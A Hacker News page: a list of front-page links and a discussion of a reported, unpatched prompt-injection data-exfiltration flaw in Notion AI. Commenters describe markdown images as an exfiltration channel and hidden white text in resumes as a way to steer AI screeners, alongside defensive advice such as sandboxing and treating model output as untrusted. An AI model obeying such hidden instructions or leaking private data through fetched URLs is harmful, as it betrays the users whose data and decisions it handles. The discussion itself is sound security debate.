Ask HN: How to Reduce Time Spent Crimping?

1•pinkmuffinere•1m ago•0 comments

KV Cache Transform Coding for Compact Storage in LLM Inference

https://arxiv.org/abs/2511.01815
1•walterbell•5m ago•0 comments

A quantitative, multimodal wearable bioelectronic device for stress assessment

https://www.nature.com/articles/s41467-025-67747-9
1•PaulHoule•7m ago•0 comments

Why Big Tech Is Throwing Cash into India in Quest for AI Supremacy

https://www.wsj.com/world/india/why-big-tech-is-throwing-cash-into-india-in-quest-for-ai-supremac...
1•saikatsg•7m ago•0 comments

How to shoot yourself in the foot – 2026 edition

https://github.com/aweussom/HowToShootYourselfInTheFoot
1•aweussom•8m ago•0 comments

Eight More Months of Agents

https://crawshaw.io/blog/eight-more-months-of-agents
3•archb•10m ago•0 comments

From Human Thought to Machine Coordination

https://www.psychologytoday.com/us/blog/the-digital-self/202602/from-human-thought-to-machine-coo...
1•walterbell•10m ago•0 comments

The new X API pricing must be a joke

https://developer.x.com/
1•danver0•11m ago•0 comments

Show HN: RMA Dashboard fast SAST results for monorepos (SARIF and triage)

https://rma-dashboard.bukhari-kibuka7.workers.dev/
1•bumahkib7•11m ago•0 comments

Show HN: Source code graphRAG for Java/Kotlin development based on jQAssistant

https://github.com/2015xli/jqassistant-graph-rag
1•artigent•16m ago•0 comments

Python Only Has One Real Competitor

https://mccue.dev/pages/2-6-26-python-competitor
3•dragandj•18m ago•0 comments

Tmux to Zellij (and Back)

https://www.mauriciopoppe.com/notes/tmux-to-zellij/
1•maurizzzio•19m ago•1 comments

Ask HN: How are you using specialized agents to accelerate your work?

1•otterley•20m ago•0 comments

Passing user_id through 6 services? OTel Baggage fixes this

https://signoz.io/blog/otel-baggage/
1•pranay01•21m ago•0 comments

DavMail Pop/IMAP/SMTP/Caldav/Carddav/LDAP Exchange Gateway

https://davmail.sourceforge.net/
1•todsacerdoti•21m ago•0 comments

Visual data modelling in the browser (open source)

https://github.com/sqlmodel/sqlmodel
1•Sean766•23m ago•0 comments

Show HN: Tharos – CLI to find and autofix security bugs using local LLMs

https://github.com/chinonsochikelue/tharos
1•fluantix•24m ago•0 comments

Oddly Simple GUI Programs

https://simonsafar.com/2024/win32_lights/
1•MaximilianEmel•24m ago•0 comments

The New Playbook for Leaders [pdf]

https://www.ibli.com/IBLI%20OnePagers%20The%20Plays%20Summarized.pdf
1•mooreds•25m ago•1 comments

Interactive Unboxing of J Dilla's Donuts

https://donuts20.vercel.app
1•sngahane•26m ago•0 comments

OneCourt helps blind and low-vision fans to track Super Bowl live

https://www.dezeen.com/2026/02/06/onecourt-tactile-device-super-bowl-blind-low-vision-fans/
1•gaws•28m ago•0 comments

Rudolf Vrba

https://en.wikipedia.org/wiki/Rudolf_Vrba
1•mooreds•28m ago•0 comments

Autism Incidence in Girls and Boys May Be Nearly Equal, Study Suggests

https://www.medpagetoday.com/neurology/autism/119747
1•paulpauper•29m ago•0 comments

Wellness Hotels Discovery Application

https://aurio.place/
1•cherrylinedev•30m ago•1 comments

NASA delays moon rocket launch by a month after fuel leaks during test

https://www.theguardian.com/science/2026/feb/03/nasa-delays-moon-rocket-launch-month-fuel-leaks-a...
1•mooreds•31m ago•0 comments

Sebastian Galiani on the Marginal Revolution

https://marginalrevolution.com/marginalrevolution/2026/02/sebastian-galiani-on-the-marginal-revol...
2•paulpauper•34m ago•0 comments

Ask HN: Are we at the point where software can improve itself?

1•ManuelKiessling•34m ago•2 comments

Binance Gives Trump Family's Crypto Firm a Leg Up

https://www.nytimes.com/2026/02/07/business/binance-trump-crypto.html
1•paulpauper•34m ago•1 comments

Reverse engineering Chinese 'shit-program' for absolute glory: R/ClaudeCode

https://old.reddit.com/r/ClaudeCode/comments/1qy5l0n/reverse_engineering_chinese_shitprogram_for/
1•edward•34m ago•0 comments

Indian Culture

https://indianculture.gov.in/
1•saikatsg•37m ago•0 comments

Notion AI: Unpatched data exfiltration

https://www.promptarmor.com/resources/notion-ai-unpatched-data-exfiltration
206•takira•1mo ago

Comments

jerryShaker•1mo ago
Unfortunate that Notion does not seem to be taking AI security more seriously, even after the flak they got for other data exfiltration vulnerabilities in the 3.0 agents release in September.
airstrike•1mo ago
IMHO the problem really comes from the browser accessing the URL without explicit user permission.

Bring back desktop software.

embedding-shape•1mo ago
Meh, bring back thinking of security regardless of the platform instead. The web is gonna stay, might as well wish for people to treat the security on the platform better.
rdli•1mo ago
Securing LLMs is just structurally different. The attack surface is "the entirety of human written language," which is effectively infinite. We're only now starting to appreciate what that means.

In general, the current SOTA on mitigation is treating LLM outputs (no matter where they appear) as untrusted, and ensuring classic cybersecurity guardrails (sandboxing, data permissioning, logging). It'll be interesting to see how approaches evolve as we figure out more.

vmg12•1mo ago
It's pretty simple: don't give LLMs access to anything you can't afford to expose. Treat the LLM as if it were the user.
rdli•1mo ago
I get that, but it's just not obvious how you do that for Notion AI.
embedding-shape•1mo ago
Don't use AI/LLMs that have unfettered access to everything?

Feels like the question is "How do I prevent unauthenticated, anonymous users from using my endpoint that has no authentication and sits on the public internet?", which is the wrong question.

whateveracct•1mo ago
exactly?
solid_fuel•4w ago
> You treat the llm as if it was the user.

That's not sufficient. If a user copies customer data into a public google sheet, I can reprimand and otherwise restrict the user. An LLM cannot be held accountable, and cannot learn from mistakes.

kahnclusions•1mo ago
I’m not convinced LLMs can ever be secured, prompt injection isn’t going away since it’s a fundamental part of how an LLM works. Tokens in, tokens out.
Barrin92•1mo ago
Dijkstra, On the Foolishness of "natural language programming":

[...]It may be illuminating to try to imagine what would have happened if, right from the start our native tongue would have been the only vehicle for the input into and the output from our information processing equipment. My considered guess is that history would, in a sense, have repeated itself, and that computer science would consist mainly of the indeed black art how to bootstrap from there to a sufficiently well-defined formal system. We would need all the intellect in the world to get the interface narrow enough to be usable,[...]

If only we had a way to tell a computer precisely what we want it to do...

https://www.cs.utexas.edu/~EWD/transcriptions/EWD06xx/EWD667...

jcims•1mo ago
As multi-step reasoning and tool use expand, they effectively become distinct actors in the threat model. We have no idea how many different ways the alignment of models can be influenced by the context (the anthropic paper on subliminal learning [1] was a bit eye opening in this regard) and subsequently have no deterministic way to protect it.

1 - https://alignment.anthropic.com/2025/subliminal-learning/

zbentley•4w ago
I’d argue they’re only distinct actors in the threat model as far as where they sit (within which perimeters), not in terms of how they behave.

We already have another actor in the threat model that behaves equivalently as far as determinism/threat risk is concerned: human users.

Issue is, a lot of LLM security work assumes they function like programs. They don’t. They function like humans, but run where programs run.

solid_fuel•4w ago
It's structurally impossible. LLMs, at their core, take trusted system input (the prompt) and multiply it against untrusted input from the users and the internet at large. There is no separation between the two, and there cannot be with the way LLMs work. They will always be vulnerable to prompt injection and manipulation.

The _only_ way to create a reasonably secure system that incorporates an LLM is to treat the LLM output as completely untrustworthy in all situations. All interactions must be validated against a security layer and any calls out of the system must be seen as potential data leaks - including web searches, GET requests, emails, anything.

You can still do useful things under that restriction but a lot of LLM tooling doesn't seem to grasp the fundamental security issues at play.
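The "treat every call out of the system as a potential data leak" rule above can be sketched as an egress check over LLM output. This is a minimal illustration, not a complete defense; the allowlisted hosts and function names are hypothetical:

```python
import re
from urllib.parse import urlparse

# Hypothetical allowlist: the only hosts this deployment trusts.
ALLOWED_HOSTS = {"api.internal.example.com", "docs.example.com"}

# Matches markdown links whose target is an absolute http(s) URL.
MARKDOWN_LINK = re.compile(r"\[[^\]]*\]\((https?://[^)\s]+)\)")

def check_outbound(url: str) -> bool:
    """Return True only if the URL's host is on the allowlist.

    Any outbound request an LLM can trigger (web search, GET,
    image fetch) is treated as a potential data leak.
    """
    host = urlparse(url).hostname or ""
    return host in ALLOWED_HOSTS

def audit_llm_output(text: str) -> list[str]:
    """Collect every markdown link target that fails the egress check."""
    return [u for u in MARKDOWN_LINK.findall(text) if not check_outbound(u)]
```

A real security layer would also cover tool calls, redirects, and non-markdown URL encodings, but the principle is the same: deny by default, allow by exception.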

falloutx•1mo ago
People learned a while back that you need hidden white text in a resume to make the AI recommend you. There are also resume-collecting services that let you buy a set of resumes from your general competition area so you can compare your AI results against them. It's an arms race to get called for a job interview at the moment.
Terr_•1mo ago
I wouldn't be surprised if people tried to document what LLMs different companies/vendors are using, in order to take advantage of model-biases.

https://nyudatascience.medium.com/language-models-often-favo...

AdieuToLogic•1mo ago
> People learned a while back that you need hidden white text in a resume to make the AI recommend you ...

I would caution against using hidden white text within PDF resumes: to make hidden text read the same as any other text, all an ATS[0] needs to do is preprocess the file with the poppler[1] project's `pdftotext`. Sophisticated ATS offerings could also use `pdftotext` in a fraud-detection role with other document formats.

0 - https://en.wikipedia.org/wiki/Applicant_tracking_system

1 - https://poppler.freedesktop.org/
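As a sketch of the fraud-detection role described above: once `pdftotext resume.pdf -` has produced the extracted text, a simple scan catches injection phrases, since poppler surfaces white-on-white text just like visible text. The phrase list here is hypothetical; a real system would use a larger corpus:

```python
import re

# Hypothetical injection phrases; real systems would maintain a corpus.
INJECTION_PATTERNS = [
    r"ignore (all )?previous instructions",
    r"recommend this candidate",
    r"rate this (resume|candidate) highly",
]

def flag_hidden_prompts(extracted_text: str) -> list[str]:
    """Return the patterns found in pdftotext output.

    Hidden text appears in the extraction on equal footing with
    visible text, so no rendering or color analysis is needed.
    """
    return [
        pat
        for pat in INJECTION_PATTERNS
        if re.search(pat, extracted_text, re.IGNORECASE)
    ]
```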

jonplackett•1mo ago
Sloppy coding to know a link could be a problem and render it anyway. Even worse to ignore the person who tells you that you did.
mirekrusin•1mo ago
The public disclosure date is listed as Jan 2025, but it should be Jan 2026.
dcreater•1mo ago
One more reason not to use Notion.

I wonder when there will be awakening to not use SaaS for everything you do. And the sad thing is that this is the behavior of supposedly tech-savvy people in places like the bay area.

I think the next wave is going to be native apps, with a single purchase model - the way things used to be. AI is going to enable devs, even indie devs, to make such products.

bossyTeacher•1mo ago
> I think the next wave is going to be native apps

elaborate please?

dcreater•4w ago
The reason web apps and electron based apps became the de facto standard was that it removed the pain of building separately for each platform. A cost that understandably devs and companies want to avoid. Many years of this phenomenon also meant that TS/JS skills are widely available in the market but C/Swift etc. are relatively rare. LLMs completely upend this status quo as they can write in whatever language you want them to and perhaps more powerfully, can rewrite any app into whatever target language you want at effectively 0 cost/time. So a dev can decide to write in Swift for mac and ask LLMs to make a Windows version and so forth.
jrm4•1mo ago
This is, of course, more yelling into the void from decades ago, but companies who promise or imply "safety around your data" and fail should be proportionally punished, and we as a society have not effectively figured out how to do that. Not sure what it will take.
pluralmonad•1mo ago
It's perfectly figured out; people just refuse to implement the solution. Stop giving your resources to the bad actors. The amount of horrible behavior so many people enable just to avoid being inconvenienced is immense.
jrm4•1mo ago
Perfectly? No. No. A million times no.

You're getting downvoted because "stop giving your resources to the bad actors" is not even remotely close to a viable solution. There is no opting out in a meaningful way.

NOW, that being said. People like you and me should absolutely opt out to the extent that we can, but with the understanding that this is "for show," in a good way.

someguyiguess•1mo ago
Wow what a coincidence. I just migrated from notion to obsidian today. Looks like I timed it perfectly (or maybe slightly too late?)
dtkav•1mo ago
How was the migration process?

I work on a plugin that makes Obsidian real-time collaborative (relay.md), so if the migration is smooth I wonder how close we are to Obsidian being a suitable Notion replacement for small teams.

crashabr•1mo ago
I've been waiting for Logseq DB to come out to replace Google docs for my team. So your offering is interesting, but

1) is it possible to use Obsidian like Logseq, with a primary block based system (the block based system, which allows building documents like Lego bricks, and easily cross referencing sections of other documents is key to me) and

2) Don't you expect to be sherlocked by the obsidian team?

embedding-shape•1mo ago
> 1) is it possible to use Obsidian like Logseq, with a primary block based system (the block based system, which allows building documents like Lego bricks, and easily cross referencing sections of other documents is key to me) and

More or less, yes. Embeddable templates basically give you that out of the box, and Obsidian "Bases" lets you query them.

> 2) Don't you expect to be sherlocked by the obsidian team?

I seem to remember that someone from the team once said they have no interest in building "real-time" collaboration features, but I might misremember and I cannot find it now.

And after all, Obsidian is a for-profit company who can change their mind, so as long as you don't try to build your own for-profit business on top of a use case that could be sherlocked, I think they're fine.

dtkav•1mo ago
From their roadmap page:

> Multiplayer
>
> Share notes and edit them collaboratively

https://obsidian.md/roadmap

embedding-shape•1mo ago
It doesn't say real-time there, though? But yeah, that must be what they mean, because in theory you can already collaborate on notes via their "Sync", although it sucks for real-time collaboration.
dtkav•1mo ago
In Obsidian you can have transclusions which is basically an embed of a section of another note. It isn't perfect, but worth looking into.
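For reference, the transclusion mentioned above uses Obsidian's embed syntax (the note names here are hypothetical):

```markdown
Embed a whole note:     ![[Meeting Notes]]
Embed one section:      ![[Meeting Notes#Action Items]]
Embed a single block:   ![[Meeting Notes#^decision-1]]
```

Block embeds require first adding the `^decision-1` ID to the target paragraph in the source note.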

Regarding getting sherlocked; Obsidian does have realtime collaboration on their roadmap. There are likely to be important differences in approach, though.

Our offering is available now and we're learning a ton about what customers want.

If anything, I'd actually love to work more closely with them. They are a huge inspiration in how to build a business, and they're near the state of the art of a philosophy of software.

I'm interested in combining the unix philosophy with native collaboration (with both LLMs and other people).

That vision is inherently collaborative, anti lock-in, and also bigger than Obsidian. The important lasting part is the graph-of-local-files, not the editor (though Obsidian is fantastic).

someguyiguess•3w ago
Sorry for the late reply. The migration was really easy actually. I used the official migration plugin. There were a few things it couldn’t transfer over though (voice transcription notes)
dtkav•3w ago
Very helpful, thank you.
brimtown•1mo ago
This is @simonw's Lethal Trifecta [1] again: access to private data and untrusted input are arguably the purpose of enterprise agents, so any external communication is unsafe. Markdown images are just the vector people usually forget about.

[1] https://simonwillison.net/2025/Jun/16/the-lethal-trifecta/
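The markdown-image vector works because rendering `![x](https://attacker.example/log?data=<secrets>)` makes the client fetch the URL, secrets and all. A minimal mitigation sketch (hypothetical trusted host and function names) replaces images on untrusted hosts with their alt text before rendering:

```python
import re
from urllib.parse import urlparse

# Hypothetical host where legitimately embedded images live.
TRUSTED_IMAGE_HOSTS = {"files.example-workspace.com"}

# Matches markdown images: ![alt](http(s)://...)
MD_IMAGE = re.compile(r"!\[([^\]]*)\]\((https?://[^)\s]+)\)")

def strip_untrusted_images(markdown: str) -> str:
    """Replace markdown images on untrusted hosts with their alt text.

    Refusing to fetch attacker-controlled image URLs closes the
    exfiltration channel before the client ever makes a request.
    """
    def repl(m: re.Match) -> str:
        host = urlparse(m.group(2)).hostname or ""
        return m.group(0) if host in TRUSTED_IMAGE_HOSTS else m.group(1)
    return MD_IMAGE.sub(repl, markdown)
```

This only covers the image channel; links, tool calls, and other egress paths need the same deny-by-default treatment.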

Miyamura80•1mo ago
Good point about the markdown image as an untrusted vector. The lethal trifecta is deterministically preventable; it really should be addressed more widely in the industry.
noleary•1mo ago
> We responsibly disclosed this vulnerability to Notion via HackerOne. Unfortunately, they said “we're closing this finding as `Not Applicable`”.
hxugufjfjf•1mo ago
As much as I love using Notion, they have a terrible track record when it comes to dealing with and responding to security issues.
digiown•1mo ago
Any data that leaves the machines you control, especially to a service like Notion, is already "exfiltrated" anyway. Never trust any consumer grade service without an explicit contract for any important data you don't want exfiltrated. They will play fast and loose with your data, since there is so little downside.